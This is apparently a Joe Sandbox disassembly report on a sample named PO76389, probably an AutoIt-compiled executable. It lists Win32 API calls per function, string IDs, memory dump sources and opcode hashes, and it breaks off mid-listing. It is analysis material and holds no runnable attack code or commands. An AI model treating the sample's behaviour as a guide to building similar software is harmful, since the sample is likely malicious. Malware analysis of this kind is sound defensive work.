                                                    • GetCursorPos.USER32(?), ref: 00517587
                                                    • GetDesktopWindow.USER32 ref: 0051759C
                                                    • GetWindowRect.USER32(00000000), ref: 005175A3
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00517605
                                                    • DestroyWindow.USER32(?), ref: 00517631
                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 0051765A
                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00517678
                                                    • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 0051769E
                                                    • SendMessageW.USER32(?,00000421,?,?), ref: 005176B3
                                                    • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 005176C6
                                                    • IsWindowVisible.USER32(?), ref: 005176E6
                                                    • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00517701
                                                    • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00517715
                                                    • GetWindowRect.USER32(?,?), ref: 0051772D
                                                    • MonitorFromPoint.USER32(?,?,00000002), ref: 00517753
                                                    • GetMonitorInfoW.USER32 ref: 0051776D
                                                    • CopyRect.USER32(?,?), ref: 00517784
                                                    • SendMessageW.USER32(?,00000412,00000000), ref: 005177EF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                     • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                    • String ID: ($0$tooltips_class32
                                                    • API String ID: 698492251-4156429822
                                                    • Opcode ID: c22ebbf27ec0c4eb91c64759a1a62c254f2383eb9476bce09faef6103f9a44f2
                                                    • Instruction ID: c220941e82fe2b87ee4085a4c1d4d851dd99f271af5076f5ee346bb6a48dbc58
                                                    • Opcode Fuzzy Hash: c22ebbf27ec0c4eb91c64759a1a62c254f2383eb9476bce09faef6103f9a44f2
                                                    • Instruction Fuzzy Hash: F7B19E71608300AFEB04DF68C985BAABBF5FF88314F00891DF5999B291D774E844CBA5
                                                    APIs
                                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 004CA839
                                                    • GetSystemMetrics.USER32(00000007), ref: 004CA841
                                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 004CA86C
                                                    • GetSystemMetrics.USER32(00000008), ref: 004CA874
                                                    • GetSystemMetrics.USER32(00000004), ref: 004CA899
                                                    • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 004CA8B6
                                                    • AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 004CA8C6
                                                    • CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 004CA8F9
                                                    • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 004CA90D
                                                    • GetClientRect.USER32(00000000,000000FF), ref: 004CA92B
                                                    • GetStockObject.GDI32(00000011), ref: 004CA947
                                                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 004CA952
                                                      • Part of subcall function 004CB736: GetCursorPos.USER32(000000FF), ref: 004CB749
                                                      • Part of subcall function 004CB736: ScreenToClient.USER32(00000000,000000FF), ref: 004CB766
                                                      • Part of subcall function 004CB736: GetAsyncKeyState.USER32(00000001), ref: 004CB78B
                                                      • Part of subcall function 004CB736: GetAsyncKeyState.USER32(00000002), ref: 004CB799
                                                    • SetTimer.USER32(00000000,00000000,00000028,004CACEE), ref: 004CA979
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                     • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                    • String ID: AutoIt v3 GUI
                                                    • API String ID: 1458621304-248962490
                                                    • Opcode ID: bfe3eab459bb48f61b7b19e90c66f27d0453ce033c8aca0c19b0def5deafaeed
                                                    • Instruction ID: e47952e4cd301c4a974cfa1798eb7d0e4807169dcfac575dd9304b0ea2b86405
                                                    • Opcode Fuzzy Hash: bfe3eab459bb48f61b7b19e90c66f27d0453ce033c8aca0c19b0def5deafaeed
                                                    • Instruction Fuzzy Hash: 7BB18F7560020AAFDB14DFA8EC46FAE7BB4FF18318F10422AFA15A7290D734D851DB55
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                     • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: _wcscat$D31560_wcscmp_wcscpy_wcsncpy_wcsstr
                                                    • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                    • API String ID: 390803403-1459072770
                                                    • Opcode ID: 757b26b0f3c744d6867fe399b9ab5fb5474fec83e8a62fa42fecc15e59e83b17
                                                    • Instruction ID: a2ab51df16d3e03b6744706ef45819f623d03e974bcb0b0292c5c7290f302ba0
                                                    • Opcode Fuzzy Hash: 757b26b0f3c744d6867fe399b9ab5fb5474fec83e8a62fa42fecc15e59e83b17
                                                    • Instruction Fuzzy Hash: 35411771904204BAD701B7659C97EBF7BFCEF55754F00005BF900A3292EB6CAA01D6B9
                                                    APIs
                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00513626
                                                    • RegCreateKeyExW.ADVAPI32(?,?,00000000,0054DBF0,00000000,?,00000000,?,?), ref: 00513694
                                                    • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 005136DC
                                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00513765
                                                    • RegCloseKey.ADVAPI32(?), ref: 00513A85
                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00513A92
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                     • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Close$ConnectCreateRegistryValue
                                                    • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                    • API String ID: 536824911-966354055
                                                    • Opcode ID: b62caa7d56065eaeee16a46f9dd4a9d3f514a034058775dc07c2d1d7142523fc
                                                    • Instruction ID: 3d6435405a48c12322428853e86fc6e7ec22dfb2df5004df2cad53beb3a0abca
                                                    • Opcode Fuzzy Hash: b62caa7d56065eaeee16a46f9dd4a9d3f514a034058775dc07c2d1d7142523fc
                                                    • Instruction Fuzzy Hash: C2029C75200601AFDB04EF25C891E6ABBE5FF88724F04845EF88A9B361EB34ED41CB55
                                                    APIs
                                                    • CharUpperBuffW.USER32(?,?), ref: 00516A52
                                                    • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00516B12
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                     • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: BuffCharMessageSendUpper
                                                    • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                    • API String ID: 3974292440-719923060
                                                    • Opcode ID: a11f85f8a265ae12dda3ecbe3d783ae639cc0ab332f664f93f7aed23da5b3674
                                                    • Instruction ID: 6a32fb65732eb4c13778cbe720fe192dc1f7fc277360117ad11d0bcceb9b8dbd
                                                    • Opcode Fuzzy Hash: a11f85f8a265ae12dda3ecbe3d783ae639cc0ab332f664f93f7aed23da5b3674
                                                    • Instruction Fuzzy Hash: 3AA193342042019BDB04EF15C991FAABBE6FF44358F14486EB8969B3D2DB38EC49CB55
                                                    APIs
                                                    • GetClassNameW.USER32(?,?,00000100), ref: 004EDD87
                                                    • __swprintf.LIBCMT ref: 004EDE28
                                                    • _wcscmp.LIBCMT ref: 004EDE3B
                                                    • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 004EDE90
                                                    • _wcscmp.LIBCMT ref: 004EDECC
                                                    • GetClassNameW.USER32(?,?,00000400), ref: 004EDF03
                                                    • GetDlgCtrlID.USER32(?), ref: 004EDF55
                                                    • GetWindowRect.USER32(?,?), ref: 004EDF8B
                                                    • GetParent.USER32(?), ref: 004EDFA9
                                                    • ScreenToClient.USER32(00000000), ref: 004EDFB0
                                                    • GetClassNameW.USER32(?,?,00000100), ref: 004EE02A
                                                    • _wcscmp.LIBCMT ref: 004EE03E
                                                    • GetWindowTextW.USER32(?,?,00000400), ref: 004EE064
                                                    • _wcscmp.LIBCMT ref: 004EE078
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                     • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf
                                                    • String ID: %s%u
                                                    • API String ID: 3119225716-679674701
                                                    • Opcode ID: 971db612654a982d8742c08951424e29a115583d0b57405439c0bac37bb172b4
                                                    • Instruction ID: 6a7c07c58302f1f5d560d03e1cf8e97c92bc361e960856099742ed84b1f8e981
                                                    • Opcode Fuzzy Hash: 971db612654a982d8742c08951424e29a115583d0b57405439c0bac37bb172b4
                                                    • Instruction Fuzzy Hash: 8BA10131604746ABD714DF26C884FABB7A8FF54315F00852BF9A9C3290DB78E905CBA5
                                                    APIs
                                                    • GetClassNameW.USER32(00000008,?,00000400), ref: 004EE6E1
                                                    • _wcscmp.LIBCMT ref: 004EE6F2
                                                    • GetWindowTextW.USER32(00000001,?,00000400), ref: 004EE71A
                                                    • CharUpperBuffW.USER32(?,00000000), ref: 004EE737
                                                    • _wcscmp.LIBCMT ref: 004EE755
                                                    • _wcsstr.LIBCMT ref: 004EE766
                                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 004EE79E
                                                    • _wcscmp.LIBCMT ref: 004EE7AE
                                                    • GetWindowTextW.USER32(00000002,?,00000400), ref: 004EE7D5
                                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 004EE81E
                                                    • _wcscmp.LIBCMT ref: 004EE82E
                                                    • GetClassNameW.USER32(00000010,?,00000400), ref: 004EE856
                                                    • GetWindowRect.USER32(00000004,?), ref: 004EE8BF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                     • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                    • String ID: @$ThumbnailClass
                                                    • API String ID: 1788623398-1539354611
                                                    • Opcode ID: 5e9d52b02c7ebb8c97243a7bd226c4f28d3a7a9bf126447bfcca343ac6100202
                                                    • Instruction ID: 900a516a1f8edef4e22566393462418eec093717c7f192456dc3264aeac190ef
                                                    • Opcode Fuzzy Hash: 5e9d52b02c7ebb8c97243a7bd226c4f28d3a7a9bf126447bfcca343ac6100202
                                                    • Instruction Fuzzy Hash: 2981BE710042859BDB01DF13D881BAB7BE8FF54315F04846BFD899A292DB38DD46CBA9
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                     • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: __wcsnicmp
                                                    • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                    • API String ID: 1038674560-1810252412
                                                    • Opcode ID: 67b1901b11dffb9b1d5520116ba584d9655aa4d2c484f4ff767a9ef6da2f966c
                                                    • Instruction ID: 2f2150b00d76be13bc782b86bbf785f7dd713d30bc1e4c6f79d33e1104f43d16
                                                    • Opcode Fuzzy Hash: 67b1901b11dffb9b1d5520116ba584d9655aa4d2c484f4ff767a9ef6da2f966c
                                                    • Instruction Fuzzy Hash: 2131C331944645B5EB14EB63CD53EEE77A46F20709F20002BF441721E5FF596F04C66A
                                                    APIs
                                                    • LoadIconW.USER32(00000063), ref: 004EF8AB
                                                    • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 004EF8BD
                                                    • SetWindowTextW.USER32(?,?), ref: 004EF8D4
                                                    • GetDlgItem.USER32(?,000003EA), ref: 004EF8E9
                                                    • SetWindowTextW.USER32(00000000,?), ref: 004EF8EF
                                                    • GetDlgItem.USER32(?,000003E9), ref: 004EF8FF
                                                    • SetWindowTextW.USER32(00000000,?), ref: 004EF905
                                                    • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 004EF926
                                                    • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 004EF940
                                                    • GetWindowRect.USER32(?,?), ref: 004EF949
                                                    • SetWindowTextW.USER32(?,?), ref: 004EF9B4
                                                    • GetDesktopWindow.USER32 ref: 004EF9BA
                                                    • GetWindowRect.USER32(00000000), ref: 004EF9C1
                                                    • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 004EFA0D
                                                    • GetClientRect.USER32(?,?), ref: 004EFA1A
                                                    • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 004EFA3F
                                                    • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 004EFA6A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                     • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                    • String ID:
                                                    • API String ID: 3869813825-0
                                                    • Opcode ID: 8c4a9b495742af4a661ce4dac3f9bc99700c57c67e6d06410e631a75a3f0c251
                                                    • Instruction ID: 2ef33349f52befd88abf5c4e5bc483b5689367e33f5d5a7f710d20b00a32c9ca
                                                    • Opcode Fuzzy Hash: 8c4a9b495742af4a661ce4dac3f9bc99700c57c67e6d06410e631a75a3f0c251
                                                    • Instruction Fuzzy Hash: 3B518D70900709AFDB209FA9DD8AF6FBBF5FF04705F004529E596A26A1C774A848DB14
                                                    APIs
                                                    • _memset.LIBCMT ref: 0051CD0B
                                                    • DestroyWindow.USER32(?,?), ref: 0051CD83
                                                      • Part of subcall function 004B7E53: _memmove.LIBCMT ref: 004B7EB9
                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0051CE04
                                                    • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0051CE26
                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0051CE35
                                                    • DestroyWindow.USER32(?), ref: 0051CE52
                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,004B0000,00000000), ref: 0051CE85
                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0051CEA4
                                                    • GetDesktopWindow.USER32 ref: 0051CEB9
                                                    • GetWindowRect.USER32(00000000), ref: 0051CEC0
                                                    • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0051CED2
                                                    • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0051CEEA
                                                      • Part of subcall function 004CB155: GetWindowLongW.USER32(?,000000EB), ref: 004CB166
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                     • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                    • String ID: 0$tooltips_class32
                                                    • API String ID: 1297703922-3619404913
                                                    • Opcode ID: 1627594fe19c0eb3a5e1ea7d1e14433af14d521b9915d95d51b710c1f2992382
                                                    • Instruction ID: 7f592787463e32f6c172cb2a272490df270afd53b3243004cbcc1fb5d4d30f39
                                                    • Opcode Fuzzy Hash: 1627594fe19c0eb3a5e1ea7d1e14433af14d521b9915d95d51b710c1f2992382
                                                    • Instruction Fuzzy Hash: 0771AB71180205AFE721CF68DC45FA63FE9FB89704F08051DF985972A1CB75E845DB26
                                                    APIs
                                                    • VariantInit.OLEAUT32(00000000), ref: 004FB46D
                                                    • VariantCopy.OLEAUT32(?,?), ref: 004FB476
                                                    • VariantClear.OLEAUT32(?), ref: 004FB482
                                                    • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 004FB561
                                                    • __swprintf.LIBCMT ref: 004FB591
                                                    • VarR8FromDec.OLEAUT32(?,?), ref: 004FB5BD
                                                    • VariantInit.OLEAUT32(?), ref: 004FB63F
                                                    • SysFreeString.OLEAUT32(00000016), ref: 004FB6D1
                                                    • VariantClear.OLEAUT32(?), ref: 004FB727
                                                    • VariantClear.OLEAUT32(?), ref: 004FB736
                                                    • VariantInit.OLEAUT32(00000000), ref: 004FB772
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                     • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                                    • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                    • API String ID: 3730832054-3931177956
                                                    • Opcode ID: 022117c6a8ded78531fc14b6632b939ebacdcef2e8a7870302889b1bdefec96e
                                                    • Instruction ID: c2a6363094e372987432f9d2cad9a1d7169c63f8b0ded09af73e1ee64867e44a
                                                    • Opcode Fuzzy Hash: 022117c6a8ded78531fc14b6632b939ebacdcef2e8a7870302889b1bdefec96e
                                                    • Instruction Fuzzy Hash: F6C10331A00219EBCB10DF66D484B7AB7B4FF06300F14846BE6059B641DB78DC55DBEA
                                                    APIs
                                                    • CharUpperBuffW.USER32(?,?), ref: 00516FF9
                                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00517044
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                     • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: BuffCharMessageSendUpper
                                                    • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                    • API String ID: 3974292440-4258414348
                                                    • Opcode ID: ead8520672bdc917a0623f746267e68ebda745152b8c5c5f84090d142708cb8d
                                                    • Instruction ID: 78e9fc93a9dd5e40a0459df48b3a95564df67053375a8e22ab57b5e7f6e5ba7e
                                                    • Opcode Fuzzy Hash: ead8520672bdc917a0623f746267e68ebda745152b8c5c5f84090d142708cb8d
                                                    • Instruction Fuzzy Hash: 4091A4342047019FDB04EF15C851BAABBE2BF88358F04485EF8965B392DB39ED4ACB55
                                                    APIs
                                                    • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0051E3BB
                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,0051BCBF), ref: 0051E417
                                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0051E457
                                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0051E49C
                                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0051E4D3
